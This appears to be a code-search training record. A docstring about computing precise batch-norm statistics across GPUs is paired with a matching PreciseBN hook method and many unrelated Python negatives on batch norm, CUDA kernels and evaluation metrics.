"0.47925803", "0.47901708", "0.47809064", "0.47799984", "0.47758543", "0.4772516", "0.47709933", "0.47695166", "0.47684658", "0.47676653", "0.4765633", "0.4762571", "0.47583732", "0.4757198", "0.47555423", "0.47536805", "0.4739716", "0.47355884", "0.47350612", "0.47327983", "0.4725364", "0.47251174", "0.4724747", "0.4724747", "0.4724747", "0.47242233", "0.47237417", "0.47237417", "0.47237417", "0.47230917", "0.4720603", "0.4719385" ]
0.0
-1
Calculate prcise BN and broadcast BN stats across GPUs.
def after_train_iter(self, runner, batch_idx: int, data_batch: DATA_BATCH = None, outputs: Optional[dict] = None) -> None: # if use `IterBasedTrainLoop``, do perform precise every # `self.interval` iters. if isinstance(runner.train_loop, IterBasedTrainLoop) and self.every_n_train_iters( runner, self.interval): self._perform_precise_bn(runner)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_precise_bn_stats(model, loader):\n # Compute the number of minibatches to use\n num_iter = min(cfg.BN.NUM_SAMPLES_PRECISE // loader.batch_size, len(loader))\n # Retrieve the BN layers\n bns = [m for m in model.modules() if isinstance(m, torch.nn.BatchNorm2d)]\n # Initialize stats storage\n mus = [torch.zeros_like(bn.running_mean) for bn in bns]\n sqs = [torch.zeros_like(bn.running_var) for bn in bns]\n # Remember momentum values\n moms = [bn.momentum for bn in bns]\n # Disable momentum\n for bn in bns:\n bn.momentum = 1.0\n # Accumulate the stats across the data samples\n for inputs, _labels in itertools.islice(loader, num_iter):\n model(inputs.cuda())\n # Accumulate the stats for each BN layer\n for i, bn in enumerate(bns):\n m, v = bn.running_mean, bn.running_var\n sqs[i] += (v + m * m) / num_iter\n mus[i] += m / num_iter\n # Set the stats and restore momentum values\n for i, bn in enumerate(bns):\n bn.running_var = sqs[i] - mus[i] * mus[i]\n bn.running_mean = mus[i]\n bn.momentum = moms[i]", "def update_bn_stats(\n model: nn.Module,\n loader: DataLoader,\n num_samples: int = 8192,\n logger: Optional[Union[logging.Logger, str]] = None) -> None:\n if is_model_wrapper(model):\n model = model.module\n\n # get dist info\n rank, world_size = mmengine.dist.get_dist_info()\n # Compute the number of mini-batches to use, if the size of dataloader is\n # less than num_iters, use all the samples in dataloader.\n num_iter = num_samples // (loader.batch_size * world_size)\n num_iter = min(num_iter, len(loader))\n # Retrieve the BN layers\n bn_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_BatchNorm))\n ]\n if len(bn_layers) == 0:\n print_log('No BN found in model', logger=logger, level=logging.WARNING)\n return\n print_log(\n f'{len(bn_layers)} BN found, run {num_iter} iters...', logger=logger)\n\n # Finds all the other norm layers with training=True.\n other_norm_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_InstanceNorm, GroupNorm))\n ]\n if len(other_norm_layers) > 0:\n print_log(\n 'IN/GN stats will not be updated in PreciseHook.',\n logger=logger,\n level=logging.INFO)\n\n # Initialize BN stats storage for computing\n # mean(mean(batch)) and mean(var(batch))\n running_means = [torch.zeros_like(bn.running_mean) for bn in bn_layers]\n running_vars = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n # Remember momentum values\n momentums = [bn.momentum for bn in bn_layers]\n # Set momentum to 1.0 to compute BN stats that reflect the current batch\n for bn in bn_layers:\n bn.momentum = 1.0\n # Average the BN stats for each BN layer over the batches\n if rank == 0:\n prog_bar = ProgressBar(num_iter)\n\n for data in itertools.islice(loader, num_iter):\n data = model.data_preprocessor(data, False)\n model(**data)\n\n for i, bn in enumerate(bn_layers):\n running_means[i] += bn.running_mean / num_iter\n running_vars[i] += bn.running_var / num_iter\n if rank == 0:\n prog_bar.update()\n\n # Sync BN stats across GPUs (no reduction if 1 GPU used)\n running_means = scaled_all_reduce(running_means, world_size)\n running_vars = scaled_all_reduce(running_vars, world_size)\n # Set BN stats and restore original momentum values\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_means[i]\n bn.running_var = running_vars[i]\n bn.momentum = momentums[i]", "def ComputeNrb(self):\r\n pass", "def _init_CodeRateAndPhaseBuffers(self):\n\n # Grid and blocks\n MAX_BLOCK_X = 1024 # current limit (32 warps of 32 threads = 1024 which is max block size x)\n numThreads = int(np.min((self.CUDA_WARP_SIZE * self.CUDA_NUM_WARPS, MAX_BLOCK_X))) # TODO: check with atomic operation to allow more than 32 warps\n \n self.block_codeMax = (numThreads,1,1)\n self.grid_codeMax = (1,1) # we only want one grid at the moment. Maybe 2 later, but need to implement atomic operation in the algorithm first!\n self.block_codeXCorrSum = (int(self.CUDA_NUM_THREADS/self.CUDA_NUM_SMX),1,1) # 1 block pr \n self.grid_codeXCorrSum = (int(self.CUDA_NUM_SMX*4),1) # Make some more grids than SMX's, so there is plenty to do for the GPU while it is waiting for data\n\n ## buffers\n self.GPU_bufCodeAndPhase = cuda.mem_alloc(int(self.Nfft*np.float32().nbytes)) # output of sum is real, In place R2C fft uses Nfft/2*complex64 bytes which is same length as Nfft*float32\n self.GPU_bufCodeAndPhaseOut = cuda.mem_alloc(int(self.Nfft*np.complex64().nbytes)) # for arrays of len >= 2**20, the in-place R2C transform does not seem to work\n self.GPU_buffers.append(self.GPU_bufCodeAndPhase)\n self.GPU_bufCodeAndPhaseResult = cuda.mem_alloc(np.float32().nbytes*3) # holds [index of max (offset complensated), argument of max (normalized), value of max]\n self.GPU_buffers.append(self.GPU_bufCodeAndPhaseResult)\n \n ## fft Plan\n self.fftPlan_codeRate_R2C = cufft.cufftPlan1d(self.Nfft,cufft.CUFFT_R2C,1) # R2C, 1 batch\n self.GPU_fftPlans.append(self.fftPlan_codeRate_R2C)\n\n ## CUDA kernels\n self.GPU_sumXCorrBuffMasks = self.CudaKernels.get_function('sumXCorrBuffMasks').prepare('PPi')\n self.GPU_findCodeRateAndPhase = self.CudaKernels.get_function('findCodeRateAndPhase').prepare('PPii')\n ## constants\n self.symsTolLow = 0.9*self.spsym # Ignore low symbol rates. avoids locking onto harmonics\n self.symsTolHigh = 1.1*self.spsym # Ignore high symbol rates (avoids false results due to slow noise and DC)\n\n self.codeRateAndPhaseOffsetLow = int(self.Nfft/self.symsTolLow)\n self.codeRateAndPhaseOffsetHigh = int(self.Nfft/self.symsTolHigh)\n ## numpy buffers\n self.__CodeRateAndPhaseResult = np.empty(3,dtype=np.float32) # holds [index of max (offset complensated), argument of max (normalized), value of max]", "def calc(self):\n self.proc_blocks = [cluster.cells for cluster in self.clusters]\n self.cell_loads = [sum([len(cell) for cell in self.proc_blocks])]\n self.particle_loads = [cluster.np for cluster in self.clusters]\n self.imbalance = LoadBalancer.get_load_imbalance(self.particle_loads)", "def __initializeKernels(self):\n # FFT plans:\n self.__initializeDopplerIfftPlan() # for Doppler Ifft\n self.__initializeDemodIfftPlan() # for demod \n self.__initializeSNRFftPlan() # for findSNR\n \n # GPU kernels\n kernel = self.CudaKernels\n ## kernels for initialization\n self.GPU_multInputVectorWithMasks = kernel.get_function('multInputVectorWithMasks').prepare('PPP')\n \n self.GPU_complexConj = kernel.get_function('complexConj').prepare('P')\n self.GPU_scaleComplexByScalar = kernel.get_function('scaleComplexByScalar').prepare('Pf')\n self.GPU_setComplexArrayToZeros = kernel.get_function('setComplexArrayToZeros').prepare('P')\n \n ## kernels for doppler search\n self.GPU_filterMasks = kernel.get_function('multInputVectorWithShiftedMasksDopp').prepare('PPPPii')\n # for multInputVectorWithShiftedMasks\n self.numBlocks = self.Nfft/self.numThreads\n self.bShapeVecMasks = (int(self.numThreads),1,1)\n self.gShapeVecMasks = (int(self.numBlocks),1)\n assert self.bShapeVecMasks[0]*self.gShapeVecMasks[0]==self.Nfft,'Dimension mismatch'\n\n self.GPU_absSumDoppler = kernel.get_function('blockAbsSumAtomic').prepare('PPi')\n # for the absSumKernel to sum the rows together\n self.bShapeAbsSum = (128,1,1) # 128 and 2 in next line is just picked TODO: should be config val\n self.gShapeAbsSum = (2,int(self.doppIdxArrayLen)) # tweak these\n\n assert self.Nfft % self.bShapeAbsSum[0]*self.gShapeAbsSum[0] == 0,'Nfft has to be dividable by block and grid dimensions'\n\n self.GPU_estDoppler = kernel.get_function('findDopplerEst').prepare('PPPii')\n # for the small kernel that finds the doppler\n self.bShapeDopp = (self.num_masks,1,1)\n self.gShapeDopp = (1,1)\n\n self.GPU_setArrayToZeros = kernel.get_function('setArrayToZeros').prepare('P')\n # for the set to zero kernel for the sum\n self.bShapeZero = (int(self.num_masks),1,1)\n self.gShapeZero = (int(self.doppIdxArrayLen),1)\n\n ## for demodulation\n self.bShapeVecMasks2 = (int(256),1,1) ## 256 is just picked, TODO: should be config val\n self.gShapeVecMasks2 = (int(self.Nfft/self.bShapeVecMasks2[0]),1)\n self.complexShiftMulMasks = kernel.get_function('multInputVectorWithShiftedMask').prepare('PPPi')\n self.complexHeterodyne = kernel.get_function('complexHeterodyne').prepare('PPfffi')\n self.findcentres = kernel.get_function('findCentres').prepare('PPPPffii')\n self.bShapeCentres = (256,1,1) ## 256 is just picked, TODO: should be config val", "def update(self, rxn_probs):\n pass", "def compute(self) -> Tensor:\n\n if self.samples:\n return self.average_precisions.float() / self.total\n else:\n # pred_image_indices = torch.cat(self.pred_image_indices, dim=0)\n pred_probs = torch.cat(self.pred_probs, dim=0)\n pred_labels = torch.cat(self.pred_labels, dim=0)\n pred_bboxes = torch.cat(self.pred_bboxes, dim=0)\n\n # target_image_indices = torch.cat(self.target_image_indices, dim=0)\n target_labels = torch.cat(self.target_labels, dim=0)\n target_bboxes = torch.cat(self.target_bboxes, dim=0)\n\n # pred_index = torch.nonzero((pred_labels == 1))\n # pred_probs = pred_probs[pred_index]\n # pred_bboxes = pred_bboxes[pred_index]\n # target_index = torch.nonzero((target_labels == 1))\n # target_bboxes = target_bboxes[target_index]\n\n\n # _, index_sorted = torch.sort(pred_probs)\n # pred_bboxes = pred_bboxes[index_sorted].cpu().detach().numpy()\n # target_bboxes = target_bboxes.cpu().detach().numpy()\n pred_probs = pred_probs.cpu().detach().numpy()\n pred_labels = pred_labels.cpu().detach().numpy()\n pred_bboxes = pred_bboxes.cpu().detach().numpy()\n target_labels = target_labels.cpu().detach().numpy()\n target_bboxes = target_bboxes.cpu().detach().numpy()\n\n pred_probs = pred_probs[pred_labels == 1]\n pred_bboxes = pred_bboxes[pred_labels == 1]\n target_bboxes = target_bboxes[target_labels == 1]\n\n preds_sorted_idx = np.argsort(pred_probs)[::-1]\n pred_bboxes = pred_bboxes[preds_sorted_idx]\n\n x, y = calculate_precision_recall(target_bboxes, pred_bboxes)\n\n if len(x) >= 2:\n return auc(x, y)\n else:\n return 0\n\n # return mean_average_precision(\n # pred_image_indices,\n # pred_probs,\n # pred_labels,\n # pred_bboxes,\n # target_image_indices,\n # target_labels,\n # target_bboxes,\n # self.iou_threshold,\n # self.ap_calculation,\n # )", "def reset_bn_stats(model):\n for m in model.modules():\n if isinstance(m, torch.nn.BatchNorm2d):\n m.reset_running_stats()", "def update_bn_stats(\n model: nn.Module,\n data_loader: Iterable[Any],\n num_iters: int = 200,\n by_epoch: bool = False):\n bn_layers = get_bn_modules(model)\n\n if len(bn_layers) == 0:\n return\n\n momentum_actual = [bn.momentum for bn in bn_layers]\n for bn in bn_layers:\n bn.momentum = 1.0\n\n running_mean = [\n torch.zeros_like(bn.running_mean) for bn in bn_layers\n ]\n running_var = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n\n if by_epoch:\n num_iters = num_iters * len(data_loader)\n\n iter_loader = IterLoader(data_loader)\n ind = -1\n with tqdm(total=num_iters) as pbar:\n pbar.set_description('Calculating running stats')\n while ind < num_iters:\n data_batch = next(iter_loader)\n output = model(data_batch['img'])\n\n ind += 1\n for i, bn in enumerate(bn_layers):\n running_mean[i] += (bn.running_mean - running_mean[i]) / (ind + 1)\n running_var[i] += (bn.running_var - running_var[i]) / (ind + 1)\n\n pbar.update(1)\n\n assert ind == num_iters, (\n \"update_bn_stats is meant to run for {} iterations, \"\n \"but the dataloader stops at {} iterations.\".format(num_iters, ind)\n )\n\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_mean[i]\n bn.running_var = running_var[i]\n bn.momentum = momentum_actual[i]", "def main():\n\n # Create an empty array to hold our points.\n n = gpuarray.zeros(shape=(x, y, z),\n dtype=gpuarray.vec.float3)\n\n # Populate the array with randomized points from the search space.\n for k in range(z):\n for j in range(y):\n for i in range(x):\n n[i, j, k] = gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-depth, depth))\n\n # Declare our elementwise CUDA kernel.\n mod = Elementwise(\n arguments=\"float3 pt, float3 *ns, float *rs\",\n operation=\"rs[i] = sqrt(pow(pt.x-ns[i].x,2)+pow(pt.y-ns[i].y,2)+pow(pt.z-ns[i].z,2))\",\n name=\"euclidean_distance\",\n preamble=\"#include <math.h>\"\n )\n\n # Declare an empty results array.\n r = gpuarray.zeros(shape=(50, 50, 2), dtype=numpy.float32)\n start = cuda.Event()\n end = cuda.Event()\n start.record()\n # Call the kernel with a randomize point from the search space.\n mod(gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-width, width)), n, r)\n end.record()\n end.synchronize()\n print((start.time_till(end)))\n print(r)", "def calcError(net, net_labels, dataset_name, dataloader, dataset, doGPU):\n # note: net_labels is a list of pairs (RAP_name, PETA_name) of attribute names\n net_attr_nbr = len(net_labels)\n assert (net_attr_nbr == 49)\n \n total = 0\n correct = 0\n batch_nbr = 0\n per_attrib_total = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_correct = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_1_pred = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_class_accuracy = torch.zeros([net_attr_nbr], dtype=torch.float) # size [92]\n if doGPU:\n per_attrib_total = per_attrib_total.cuda()\n per_attrib_correct = per_attrib_correct.cuda()\n per_attrib_1_pred = per_attrib_1_pred.cuda()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cuda()\n \n with torch.no_grad():\n # loop over batches\n # accumulate per-attribute and total number of correct predictions\n for i_batch, sample_batched in enumerate(dataloader):\n assert (sample_batched['image'].shape[1:] == (3,128,48)), \"wrong image size\"\n batch_nbr += 1\n real_batch_size = sample_batched['image'].shape[0]\n total += real_batch_size * net_attr_nbr\n per_attrib_total += real_batch_size # size [net_attr_nbr]\n assert (per_attrib_total.sum().item() == total)\n try:\n assert (batch_nbr == math.ceil(per_attrib_total[0].item()/Param_Batchsize))\n except AssertionError:\n ipdb.set_trace()\n pass\n\n\n # prepare data for prediction\n if doGPU:\n inp = Variable(sample_batched['image'].float().cuda())\n else:\n inp = Variable(sample_batched['image'].float())\n\n # retrieve ground truth\n dataset_lab_gt = sample_batched['label'] # shape == [50,NB_ATTRIB]\n\n # convert ground truth to model attributes\n if dataset_name == 'datasetRAPPETA':\n assert (dataset_lab_gt.shape[1] == 49)\n # no conversion needed, use ground truth as it is\n lab_gt = dataset_lab_gt\n elif dataset_name == 'datasetRAP':\n assert (dataset_lab_gt.shape[1] == 92)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_RAP = [rap_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_RAP):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n elif dataset_name == 'datasetPETA':\n assert (dataset_lab_gt.shape[1] == 104)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_PETA = [peta_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_PETA):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n else:\n print('Unknown dataset \\'' + dataset_name + '\\'')\n sys.exit(1)\n\n # 'format' ground truth for Torch\n lab_gtv = Variable(lab_gt)\n if doGPU:\n lab_gtv = lab_gtv.cuda()\n\n # do prediction\n logits = net.forward(inp) # output without Sigmoid\n predictions = (logits > 0).int() # size [50, net_attr_nbr]\n assert (net_attr_nbr == predictions.shape[1])\n\n # accumulate total number of correct predictions\n correct += (lab_gtv == predictions).sum()\n\n # accumulate per-attribute number of correct predictions\n per_batch_and_attrib_correct = (lab_gtv == predictions) # size [50, net_attr_nbr]\n #if doGPU:\n # per_batch_and_attrib_correct = per_batch_and_attrib_correct.cpu()\n per_attrib_correct += per_batch_and_attrib_correct.sum(0) # size [net_attr_nbr]\n assert (per_attrib_correct.sum().item() == correct)\n\n # accumulate number of 1 predictions for each attribute\n per_attrib_1_pred += predictions.sum(0) # size [net_attr_nbr]\n\n # accumulate for class-accuracy\n per_batch_and_attrib_1_good_prediction = (predictions.byte() * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_good_prediction = ((1 - predictions.byte()) * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n assert torch.equal(per_batch_and_attrib_1_good_prediction + per_batch_and_attrib_0_good_prediction, per_batch_and_attrib_correct.sum(0))\n per_batch_and_attrib_1_ground_truth = lab_gtv.sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_ground_truth = (1 - lab_gtv).sum(0) #size [net_attr_nbr]\n try:\n assert torch.equal(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth, torch.tensor([real_batch_size] * net_attr_nbr).cuda())\n except AssertionError:\n print(\"per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth=\")\n print(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth)\n ipdb.set_trace()\n pass\n\n per_batch_and_attrib_recall_1 = per_batch_and_attrib_1_good_prediction.float() / per_batch_and_attrib_1_ground_truth.float() #size [net_attr_nbr]\n # nan values appear when ground_truth number of 1 value is 0\n # in this case, good_prediction can not be different of 0\n # (there can not be a good prediction of 1 because there is not\n # any 1 in the ground truth)\n # so a nan appears only when recall = 0 good pred / 0 case in ground truth\n # so recall=nan can be safely replaced by a recall=1\n person.replace_nan_by_one(per_batch_and_attrib_recall_1)\n per_batch_and_attrib_recall_0 = per_batch_and_attrib_0_good_prediction.float() / per_batch_and_attrib_0_ground_truth.float() #size [net_attr_nbr]\n person.replace_nan_by_one(per_batch_and_attrib_recall_0)\n # class_accuracy = mean(recall_of_0, recall_of_1)\n per_batch_and_attrib_class_accuracy = (per_batch_and_attrib_recall_0 + per_batch_and_attrib_recall_1) / 2.0 #size [net_attr_nbr]\n per_attrib_class_accuracy += per_batch_and_attrib_class_accuracy #size [net_attr_nbr]\n\n assert (total == (dataloader.dataset.__len__() * net_attr_nbr))\n \n if doGPU:\n per_attrib_total = per_attrib_total.cpu()\n per_attrib_correct = per_attrib_correct.cpu()\n per_attrib_1_pred = per_attrib_1_pred.cpu()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cpu()\n\n # compute per-attribute and global average prediction error\n err = (1.0-correct.item()/total)\n per_attrib_err = (1.0 - (per_attrib_correct.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float))) # size [net_attr_nbr]\n np.testing.assert_allclose(per_attrib_err.mean().item(), err, rtol=1e-5)\n\n # compute per-attribute number of 1 predictions\n per_attrib_1_pred_rate = 100 * (per_attrib_1_pred.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float)) # size [net_attr_nbr]\n\n # compute mean class_accuracy over batches\n per_attrib_class_accuracy = per_attrib_class_accuracy * 1.0 / batch_nbr \n\n return err, per_attrib_err, per_attrib_1_pred_rate, per_attrib_class_accuracy", "def __call__(self, epoch, update):\n ii=1\n count = 0\n list = []\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n while True:\n i, p = next(self.gen)\n if p.poll():\n grads = []\n for i, fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs * 4)\n grads.append(np.ndarray(self.shapes[i], np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv()\n\n count += 1\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n staleness = update - last_update\n else:\n ii += 1\n if ii % self.learners == 0:\n time.sleep(0.0001)\n if count == self.num:\n binning = 0\n for i in self.bins:\n if staleness >= i:\n binning += 1\n else:\n break\n self.bin_counts[binning] += 1\n logger.debug(\"staleness\", staleness, \"put in bin\", binning, flush=True)\n return gradients_list, from_list, global_update_list, step_list, metrics_list, binning, 2", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def findCodeRateAndPhaseGPU(self):\n\n # Abs**2 sum all Masks \n self.GPU_sumXCorrBuffMasks.prepared_call(self.grid_codeXCorrSum,self.block_codeXCorrSum,\n self.GPU_bufCodeAndPhase,self.GPU_bufXcorr,np.int32(self.Nfft))\n\n # fft real to complex in-place output is Nfft/2*complex64 input is Nfft*float32\n cufft.cufftExecR2C(self.fftPlan_codeRate_R2C,int(self.GPU_bufCodeAndPhase),int(self.GPU_bufCodeAndPhaseOut))\n\n # find the code rate from the magnitude and phase from the argument\n\n self.GPU_findCodeRateAndPhase.prepared_call(self.grid_codeMax, self.block_codeMax,\n self.GPU_bufCodeAndPhaseResult,self.GPU_bufCodeAndPhaseOut,np.int32(self.codeRateAndPhaseOffsetHigh),np.int32(self.codeRateAndPhaseOffsetLow-self.codeRateAndPhaseOffsetHigh))\n\n if log.level == logging.DEBUG:\n log.debug(f'Code rate index: low {self.codeRateAndPhaseOffsetLow}\\t high {self.codeRateAndPhaseOffsetHigh}')\n cuda.memcpy_dtoh(self.__CodeRateAndPhaseResult,self.GPU_bufCodeAndPhaseResult)\n\n\n try:\n # compute symbol rate\n spSym = self.Nfft/self.__CodeRateAndPhaseResult[0]\n\n except:\n log.error(self.__CodeRateAndPhaseResult)\n log.error('Code rate result 0 should not happen but happened -- fixing it to 10')\n spSym = 10\n \n \n try:\n # compute codeOffset\n codeOffset = -self.__CodeRateAndPhaseResult[1]/np.pi*spSym/2 #\n if codeOffset < 0: # wrap negative values\n codeOffset += spSym - 1\n except:\n log.warning('Error while computing code offset: codeOffset from GPU {}, index {}, max val {}'.format(self.__CodeRateAndPhaseResult[1],self.__CodeRateAndPhaseResult[0],self.__CodeRateAndPhaseResult[2]))\n codeOffset = 0\n\n return spSym, codeOffset", "def conv_bn_relu_forward(x, w, b, gamma, beta, conv_param, bn_param):\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n an, sbn_cache = spatial_batchnorm_forward(a, gamma, beta, bn_param)\n out, relu_cache = relu_forward(an)\n cache = (conv_cache, sbn_cache, relu_cache)\n return out, cache", "def collect_via_pynvml(self, stats_config):\n try:\n NVML_TEMPERATURE_GPU = 0\n pynvml.nvmlInit()\n device_count = pynvml.nvmlDeviceGetCount()\n\n for device_index in xrange(device_count):\n handle = pynvml.nvmlDeviceGetHandleByIndex(device_index)\n memoryInfo = pynvml.nvmlDeviceGetMemoryInfo(handle)\n utilizationRates = pynvml.nvmlDeviceGetUtilizationRates(handle)\n\n metrics = {\n 'memory.total': memoryInfo.total / 1024 / 1024,\n 'memory.used': memoryInfo.total / 1024 / 1024,\n 'memory.free': memoryInfo.free / 1024 / 1024,\n 'utilization.gpu': utilizationRates.gpu,\n 'utilization.memory': utilizationRates.memory,\n 'temperature.gpu':\n pynvml.nvmlDeviceGetTemperature(handle,\n NVML_TEMPERATURE_GPU)\n }\n\n for stat_name in stats_config[1:]:\n metric = metrics.get(stat_name)\n if metric:\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(device_index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)\n finally:\n pynvml.nvmlShutdown()", "def bn_update(loader, model):\n if not check_bn(model):\n return\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n for input, _ in loader:\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n b = input_var.data.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n model(input_var)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))", "def get_distribution(self):\n self.calc()\n proc_blocks = self.proc_blocks\n proc_num_particles = self.particle_loads\n cell_proc = LoadBalancer.get_block_proc(proc_blocks=proc_blocks)\n return cell_proc, proc_num_particles", "def _check_PSNR(self, dataset, is_test=False):\n\n # process one image per iter for test phase\n if is_test:\n batch_size = 1\n else:\n batch_size = 1 # self.batch_size\n\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=1)\n\n avr_psnr = 0\n avr_ssim = 0\n\n # book keeping variables for test phase\n psnrs = [] # psnr for each image\n ssims = [] # ssim for each image\n proc_time = [] # processing time\n outputs = [] # output for each image\n names = []\n\n for batch, sample in enumerate(dataloader):\n input_batch, label_batch, name = sample['lr'], sample['hr'], sample['im_name']\n\n # Wrap with torch Variable\n input_batch, label_batch = self._wrap_variable(input_batch,\n label_batch,\n self.use_gpu)\n\n if is_test:\n start = time.time()\n if self.model_name in ['TDAN']:\n output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = forward_x8(input_batch, self.model).unsqueeze(0)\n #print(output_batch.size())\n # _, lrs = self.model(input_batch)\n # output_batch = lrs[:, -1, :, :, :]\n else:\n output_batch = self.model(input_batch)\n elapsed_time = time.time() - start\n else:\n if self.model_name in ['TDAN']:\n #output_batch, _ = self.model(input_batch)\n output_batch = chop_forward(input_batch, self.model, 4)\n else:\n output_batch = self.model(input_batch)\n # ssim is calculated with the normalize (range [0, 1]) image\n ssim = pytorch_ssim.ssim(output_batch + 0.5, label_batch + 0.5, size_average=False)\n ssim = torch.sum(ssim.data)\n avr_ssim += ssim\n\n # calculate PSRN\n output = output_batch.data\n label = label_batch.data\n\n output = (output + 0.5) * 255\n label = (label + 0.5) * 255\n\n output = quantize(output, 255)\n label = quantize(label, 255)\n # diff = input - target\n\n output = output.squeeze(dim=0)\n label = label.squeeze(dim=0)\n\n psnr = self._comput_PSNR(output / 255.0, label / 255.0)\n # print(psnr)\n avr_psnr += psnr\n\n # save psnrs and outputs for statistics and generate image at test time\n if is_test:\n psnrs.append(psnr)\n ssims.append(ssim)\n 